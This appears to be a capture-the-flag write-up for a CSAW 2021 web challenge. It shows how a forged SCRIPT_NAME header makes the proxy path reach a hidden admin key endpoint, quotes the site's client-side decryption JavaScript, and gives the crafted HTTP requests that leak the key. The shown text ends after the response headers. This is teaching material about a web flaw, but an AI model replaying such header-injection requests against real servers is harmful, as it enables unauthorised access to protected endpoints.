My previous flag file got encrypted by some dumb ransomware. They didn’t even tell me how to pay them, so I’m totally out of luck. All I have is the site that is supposed to decrypt my files (but obviously that doesn’t work either).
SCRIPT_NAME is a header that is sent by the proxy to the backend.SCRIPT_NAME is used to set the request url’s root path so that the application knows its virtual “location”. This may be an empty string , if the application corresponds to the “root” of the server.
1 2 3 4 5 6 7 8 9
GET /asf/admin/admin/key HTTP/1.1 Host: 172.17.0.2 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 SCRIPT_NAME: /admin Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
In this case we are requesting /asf/admin/admin/key while SCRIPT_NAME is set to /admin which means forwarded request to backend will be /admin/key.
try { let res = await fetch('/decrypt', { method:'POST', headers: { key_id }, body: data }); if (res.status === 200) { let dec_data = await res.blob(); let a = document.createElement('a'); a.setAttribute('href', URL.createObjectURL(dec_data)); a.setAttribute('download', file.name.split('.').slice(0,-1).join('.')); document.body.appendChild(a); a.click(); document.body.removeChild(a); } elseif (res.status === 403) { error(`You must pay the ransom before you can decrypt your file!`); } else { throw"bad"; } } catch(e) { error(`There was an error decrypting your file, please try again later!`); } } reader.readAsArrayBuffer(file); }
As you can see that key_id is calculated and updated to the backend using javascript, which means we can upload any file and acquire the key from client-side(index.html).
As we have to decryptflag.txt.encwe have to calculatekey_idcorresponding toflag.txt.encthis could be done by uploadingflag.txt.encand debugging javascript.The calculatedkey_idis 05d1dc92ce82cc09d9d7ff1ac9d5611d
Leaking the Key and decrypting flag
Request
1 2 3 4
GET /asf/admin/admin/key HTTP/1.1 Host: web.chal.csaw.io:5004 key_id: 05d1dc92ce82cc09d9d7ff1ac9d5611d SCRIPT_NAME: /admin
Response
1 2 3 4 5 6 7 8
HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Sep 2021 11:11:10 GMT Content-Type: application/json Content-Length: 75 Connection: close